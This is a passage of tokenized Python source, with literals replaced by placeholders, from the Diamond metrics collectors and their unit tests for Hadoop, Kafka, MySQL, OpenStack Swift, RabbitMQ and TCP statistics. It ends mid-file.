<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from hadoop import HadoopCollector <EOL> import os <EOL> class TestHadoopCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : [ os . path . dirname ( __file__ ) + '<STR_LIT>' ] , <EOL> } ) <EOL> self . collector = HadoopCollector ( config , { } ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( HadoopCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> self . collector . collect ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMetricMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import urllib2 <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> ElementTree = None <EOL> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import run_only <EOL> from test import unittest <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from kafkastat import KafkaCollector <EOL> def run_only_if_ElementTree_is_available ( func ) : <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> ElementTree = None <EOL> pred = lambda : ElementTree is not None <EOL> return run_only ( func , pred ) <EOL> class TestKafkaCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> <EOL> } ) <EOL> self . collector = KafkaCollector ( config , None ) <EOL> def _get_xml_fixture ( self , name ) : <EOL> fixture = self . getFixture ( name ) <EOL> return ElementTree . fromstring ( fixture . getvalue ( ) ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( KafkaCollector ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get ( self , urlopen_mock ) : <EOL> urlopen_mock . return_value = self . getFixture ( '<STR_LIT>' ) <EOL> result = self . collector . _get ( '<STR_LIT>' ) <EOL> result_string = ElementTree . tostring ( result ) <EOL> self . assertEqual ( result_string , '<STR_LIT>' ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_httperror ( self , urlopen_mock ) : <EOL> urlopen_mock . side_effect = urllib2 . URLError ( '<STR_LIT>' ) <EOL> result = self . collector . _get ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_bad_xml ( self , urlopen_mock ) : <EOL> urlopen_mock . return_value = self . getFixture ( '<STR_LIT>' ) <EOL> result = self . collector . 
_get ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_get_mbeans ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_names = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> found_beans = self . collector . get_mbeans ( '<STR_LIT:*>' ) <EOL> self . assertEqual ( found_beans , expected_names ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_get_mbeans_get_fail ( self , get_mock ) : <EOL> get_mock . return_value = None <EOL> found_beans = self . collector . get_mbeans ( '<STR_LIT:*>' ) <EOL> self . assertEqual ( found_beans , None ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : int ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> } <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' ) <EOL> self . assertEqual ( metrics , expected_metrics ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean_with_prefix ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : int ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> } <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . 
assertEqual ( metrics , expected_metrics ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean_fail ( self , get_mock ) : <EOL> get_mock . return_value = None <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' ) <EOL> self . assertEqual ( metrics , None ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test ( self , publish_mock , urlopen_mock ) : <EOL> urlopen_mock . side_effect = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . collect ( ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , expected_metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> try : <EOL> import MySQLdb <EOL> from MySQLdb import MySQLError <EOL> except ImportError : <EOL> MySQLdb = None <EOL> import diamond <EOL> import time <EOL> import re <EOL> class MySQLPerfCollector ( diamond . collector . Collector ) : <EOL> def process_config ( self ) : <EOL> super ( MySQLPerfCollector , self ) . process_config ( ) <EOL> self . db = None <EOL> self . last_wait_count = { } <EOL> self . last_wait_sum = { } <EOL> self . last_timestamp = { } <EOL> self . last_data = { } <EOL> self . monitors = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } <EOL> } <EOL> if self . config [ '<STR_LIT>' ] . __class__ . __name__ != '<STR_LIT:list>' : <EOL> self . config [ '<STR_LIT>' ] = [ self . config [ '<STR_LIT>' ] ] <EOL> if '<STR_LIT:host>' in self . config : <EOL> hoststr = "<STR_LIT>" % ( <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT>' ] , <EOL> self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:port>' ] , <EOL> self . config [ '<STR_LIT>' ] , <EOL> ) <EOL> self . 
config [ '<STR_LIT>' ] . append ( hoststr ) <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( MySQLPerfCollector , self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( MySQLPerfCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT:False>' , <EOL> } ) <EOL> return config <EOL> def connect ( self , params ) : <EOL> if MySQLdb is None : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return <EOL> try : <EOL> self . db = MySQLdb . connect ( ** params ) <EOL> except MySQLError , e : <EOL> self . log . error ( '<STR_LIT>' , <EOL> e ) <EOL> return { } <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> def query_list ( self , query , params ) : <EOL> cursor = self . db . cursor ( ) <EOL> cursor . execute ( query , params ) <EOL> return list ( cursor . fetchall ( ) ) <EOL> def slave_load ( self , nickname , thread ) : <EOL> data = self . query_list ( """<STR_LIT>""" , ( thread , ) ) <EOL> wait_sum = sum ( [ x [ <NUM_LIT:1> ] for x in data ] ) <EOL> wait_count = sum ( [ x [ <NUM_LIT:2> ] for x in data ] ) <EOL> timestamp = int ( time . time ( ) ) <EOL> if <NUM_LIT:0> in data and len ( data [ <NUM_LIT:0> ] ) > <NUM_LIT:5> : <EOL> cur_event_name , timestamp = data [ <NUM_LIT:0> ] [ <NUM_LIT:3> : ] <EOL> if thread not in self . last_wait_sum : <EOL> self . last_wait_sum [ thread ] = wait_sum <EOL> self . last_wait_count [ thread ] = wait_count <EOL> self . last_timestamp [ thread ] = timestamp <EOL> self . last_data [ thread ] = data <EOL> return <EOL> wait_delta = wait_sum - self . last_wait_sum [ thread ] <EOL> time_delta = ( timestamp - self . 
last_timestamp [ thread ] ) * <NUM_LIT> <EOL> if time_delta == <NUM_LIT:0> : <EOL> return <EOL> thread_name = thread [ thread . rfind ( '<STR_LIT:/>' ) + <NUM_LIT:1> : ] <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) ] ) ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if ( x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) and <EOL> x [ <NUM_LIT:0> ] not in self . monitors [ thread_name ] ) ] ) - data [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) ] ) ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if ( x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) and <EOL> x [ <NUM_LIT:0> ] not in self . monitors [ thread_name ] ) ] ) ] ) <EOL> for d in zip ( self . last_data [ thread ] , data ) : <EOL> if d [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] in self . monitors [ thread_name ] : <EOL> self . publish ( nickname + thread_name + '<STR_LIT:.>' + <EOL> self . monitors [ thread_name ] [ d [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] , <EOL> ( d [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] - d [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) / time_delta * <NUM_LIT:100> ) <EOL> self . publish ( nickname + thread_name + '<STR_LIT>' , <EOL> float ( time_delta - wait_delta ) / time_delta * <NUM_LIT:100> ) <EOL> self . last_wait_sum [ thread ] = wait_sum <EOL> self . last_wait_count [ thread ] = wait_count <EOL> self . last_timestamp [ thread ] = timestamp <EOL> self . last_data [ thread ] = data <EOL> def collect ( self ) : <EOL> for host in self . config [ '<STR_LIT>' ] : <EOL> matches = re . search ( <EOL> '<STR_LIT>' , host ) <EOL> if not matches : <EOL> continue <EOL> params = { } <EOL> params [ '<STR_LIT:host>' ] = matches . 
group ( <NUM_LIT:3> ) <EOL> try : <EOL> params [ '<STR_LIT:port>' ] = int ( matches . group ( <NUM_LIT:4> ) ) <EOL> except ValueError : <EOL> params [ '<STR_LIT:port>' ] = <NUM_LIT> <EOL> params [ '<STR_LIT>' ] = matches . group ( <NUM_LIT:5> ) <EOL> params [ '<STR_LIT:user>' ] = matches . group ( <NUM_LIT:1> ) <EOL> params [ '<STR_LIT>' ] = matches . group ( <NUM_LIT:2> ) <EOL> nickname = matches . group ( <NUM_LIT:6> ) <EOL> if len ( nickname ) : <EOL> nickname += '<STR_LIT:.>' <EOL> self . connect ( params = params ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> self . slave_load ( nickname , '<STR_LIT>' ) <EOL> self . slave_load ( nickname , '<STR_LIT>' ) <EOL> self . db . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> from subprocess import Popen , PIPE <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class OpenstackSwiftCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( OpenstackSwiftCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( OpenstackSwiftCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> return config <EOL> def collect ( self ) : <EOL> if ( self . config [ '<STR_LIT>' ] ) : <EOL> p = Popen ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = PIPE , <EOL> stderr = PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> self . publish ( '<STR_LIT>' , len ( stderr . split ( '<STR_LIT:\n>' ) ) - <NUM_LIT:1> ) <EOL> data = json . loads ( stdout ) <EOL> for t in ( '<STR_LIT:object>' , '<STR_LIT>' ) : <EOL> for ( k , v ) in data [ t ] . items ( ) : <EOL> self . publish ( '<STR_LIT>' % ( t , k ) , v ) <EOL> if ( self . config [ '<STR_LIT>' ] ) : <EOL> account = '<STR_LIT>' % ( self . config [ '<STR_LIT>' ] , self . config [ '<STR_LIT:user>' ] ) <EOL> for container in self . config [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) : <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , self . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , account , <EOL> '<STR_LIT>' , self . 
config [ '<STR_LIT:password>' ] , <EOL> '<STR_LIT>' , container ] <EOL> p = Popen ( cmd , stdout = PIPE , stderr = PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> stats = { } <EOL> for line in stdout . split ( '<STR_LIT:\n>' ) : <EOL> if line : <EOL> line = line . split ( '<STR_LIT::>' , <NUM_LIT:2> ) <EOL> stats [ line [ <NUM_LIT:0> ] . strip ( ) ] = line [ <NUM_LIT:1> ] . strip ( ) <EOL> key = '<STR_LIT>' % ( self . config [ '<STR_LIT>' ] , <EOL> container ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) <EOL> self . publish ( '<STR_LIT>' % key , stats [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> import re <EOL> from urlparse import urljoin <EOL> from urllib import quote <EOL> import urllib2 <EOL> from base64 import b64encode <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class RabbitMQClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , user , password , timeout = <NUM_LIT:5> , scheme = "<STR_LIT:http>" ) : <EOL> self . base_url = '<STR_LIT>' % ( scheme , host ) <EOL> self . timeout = timeout <EOL> self . _authorization = '<STR_LIT>' + b64encode ( '<STR_LIT>' % ( user , password ) ) <EOL> def do_call ( self , path ) : <EOL> url = urljoin ( self . base_url , path ) <EOL> req = urllib2 . Request ( url ) <EOL> req . add_header ( '<STR_LIT>' , self . _authorization ) <EOL> return json . load ( urllib2 . urlopen ( req , timeout = self . timeout ) ) <EOL> def get_all_vhosts ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_vhost_names ( self ) : <EOL> return [ i [ '<STR_LIT:name>' ] for i in self . get_all_vhosts ( ) ] <EOL> def get_queues ( self , vhost = None ) : <EOL> path = '<STR_LIT>' <EOL> if vhost : <EOL> vhost = quote ( vhost , '<STR_LIT>' ) <EOL> path += '<STR_LIT>' % vhost <EOL> queues = self . do_call ( path ) <EOL> return queues or [ ] <EOL> def get_overview ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_nodes ( self ) : <EOL> return self . do_call ( '<STR_LIT>' ) <EOL> def get_node ( self , node ) : <EOL> return self . do_call ( '<STR_LIT>' % node ) <EOL> class RabbitMQCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( RabbitMQCollector , self ) . get_default_config_help ( ) <EOL> config_help . 
update ( { <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( RabbitMQCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:http>' , <EOL> } ) <EOL> return config <EOL> def collect_health ( self ) : <EOL> health_metrics = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> client = RabbitMQClient ( self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT:password>' ] , <EOL> scheme = self . config [ '<STR_LIT>' ] ) <EOL> node_name = client . get_overview ( ) [ '<STR_LIT>' ] <EOL> node_data = client . get_node ( node_name ) <EOL> for metric in health_metrics : <EOL> self . publish ( '<STR_LIT>' . format ( metric ) , node_data [ metric ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> self . publish ( '<STR_LIT>' , <EOL> len ( node_data [ '<STR_LIT>' ] ) ) <EOL> content = client . get_nodes ( ) <EOL> self . publish ( '<STR_LIT>' , len ( content ) ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' , e ) <EOL> return { } <EOL> def collect ( self ) : <EOL> self . 
collect_health ( ) <EOL> matchers = [ ] <EOL> if self . config [ '<STR_LIT>' ] : <EOL> for reg in self . config [ '<STR_LIT>' ] . split ( ) : <EOL> matchers . append ( re . compile ( reg ) ) <EOL> try : <EOL> client = RabbitMQClient ( self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT:password>' ] , <EOL> scheme = self . config [ '<STR_LIT>' ] ) <EOL> legacy = False <EOL> if '<STR_LIT>' not in self . config : <EOL> legacy = True <EOL> if '<STR_LIT>' in self . config : <EOL> vhost_conf = { "<STR_LIT:*>" : self . config [ '<STR_LIT>' ] } <EOL> else : <EOL> vhost_conf = { "<STR_LIT:*>" : "<STR_LIT>" } <EOL> if not legacy : <EOL> vhost_names = client . get_vhost_names ( ) <EOL> if "<STR_LIT:*>" in self . config [ '<STR_LIT>' ] : <EOL> for vhost in vhost_names : <EOL> if vhost not in self . config [ '<STR_LIT>' ] : <EOL> self . config [ '<STR_LIT>' ] [ vhost ] = self . config [ <EOL> '<STR_LIT>' ] [ '<STR_LIT:*>' ] <EOL> del self . config [ '<STR_LIT>' ] [ "<STR_LIT:*>" ] <EOL> vhost_conf = self . config [ '<STR_LIT>' ] <EOL> for vhost in vhost_conf : <EOL> vhost_name = vhost <EOL> if self . config [ '<STR_LIT>' ] : <EOL> vhost_name = vhost_name . replace ( <EOL> '<STR_LIT:.>' , self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> vhost_name = vhost_name . replace ( <EOL> '<STR_LIT:/>' , self . config [ '<STR_LIT>' ] ) <EOL> queues = vhost_conf [ vhost ] <EOL> if queues == "<STR_LIT:*>" : <EOL> queues = "<STR_LIT>" <EOL> allowed_queues = queues . split ( ) <EOL> if legacy : <EOL> vhost = None <EOL> for queue in client . get_queues ( vhost ) : <EOL> if ( ( queue [ '<STR_LIT:name>' ] not in allowed_queues and <EOL> len ( allowed_queues ) > <NUM_LIT:0> ) ) : <EOL> continue <EOL> if matchers and any ( <EOL> [ m . 
match ( queue [ '<STR_LIT:name>' ] ) for m in matchers ] ) : <EOL> continue <EOL> for key in queue : <EOL> prefix = "<STR_LIT>" <EOL> if not legacy : <EOL> prefix = "<STR_LIT>" % ( vhost_name , "<STR_LIT>" ) <EOL> queue_name = queue [ '<STR_LIT:name>' ] <EOL> if self . config [ '<STR_LIT>' ] : <EOL> queue_name = queue_name . replace ( <EOL> '<STR_LIT:.>' , self . config [ '<STR_LIT>' ] ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> queue_name = queue_name . replace ( <EOL> '<STR_LIT:/>' , self . config [ '<STR_LIT>' ] ) <EOL> name = '<STR_LIT>' . format ( prefix , queue_name ) <EOL> self . _publish_metrics ( name , [ ] , key , queue ) <EOL> overview = client . get_overview ( ) <EOL> for key in overview : <EOL> self . _publish_metrics ( '<STR_LIT>' , [ ] , key , overview ) <EOL> except Exception , e : <EOL> self . log . error ( '<STR_LIT>' , e ) <EOL> return { } <EOL> def _publish_metrics ( self , name , prev_keys , key , data ) : <EOL> """<STR_LIT>""" <EOL> value = data [ key ] <EOL> keys = prev_keys + [ key ] <EOL> if isinstance ( value , dict ) : <EOL> for new_key in value : <EOL> self . _publish_metrics ( name , keys , new_key , value ) <EOL> elif isinstance ( value , ( float , int , long ) ) : <EOL> joined_keys = '<STR_LIT:.>' . join ( keys ) <EOL> if name : <EOL> publish_key = '<STR_LIT>' . format ( name , joined_keys ) <EOL> else : <EOL> publish_key = joined_keys <EOL> if isinstance ( value , bool ) : <EOL> value = int ( value ) <EOL> self . publish ( publish_key , value ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from tcp import TCPCollector <EOL> class TestTCPCollector ( CollectorTestCase ) : <EOL> def setUp ( self , allowed_names = None ) : <EOL> if not allowed_names : <EOL> allowed_names = [ ] <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : allowed_names , <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } ) <EOL> self . collector = TCPCollector ( config , None ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( TCPCollector ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_open_proc_net_netstat ( self , publish_mock , open_mock ) : <EOL> TCPCollector . PROC = [ '<STR_LIT>' ] <EOL> open_mock . return_value = StringIO ( '<STR_LIT>' ) <EOL> self . collector . collect ( ) <EOL> open_mock . assert_called_once_with ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_synthetic_data ( self , publish_mock , open_mock ) : <EOL> TCPCollector . PROC = [ '<STR_LIT>' ] <EOL> self . setUp ( [ '<STR_LIT:A>' , '<STR_LIT:C>' ] ) <EOL> open_mock . return_value = StringIO ( '''<STR_LIT>''' . strip ( ) ) <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> open_mock . return_value = StringIO ( '''<STR_LIT>''' . strip ( ) ) <EOL> self . collector . collect ( ) <EOL> self . assertEqual ( len ( publish_mock . call_args_list ) , <NUM_LIT:2> ) <EOL> metrics = { <EOL> '<STR_LIT:A>' : <NUM_LIT:0> , <EOL> '<STR_LIT:C>' : <NUM_LIT:2> , <EOL> } <EOL> self . 
assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> self . setUp ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> TCPCollector . PROC = [ self . getFixturePath ( '<STR_LIT>' ) ] <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> TCPCollector . PROC = [ self . getFixturePath ( '<STR_LIT>' ) ] <EOL> self . collector . collect ( ) <EOL> metrics = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_should_work_with_all_data ( self , publish_mock ) : <EOL> self . setUp ( [ ] ) <EOL> TCPCollector . PROC = [ <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . collect ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> TCPCollector . PROC = [ <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> self . getFixturePath ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . 
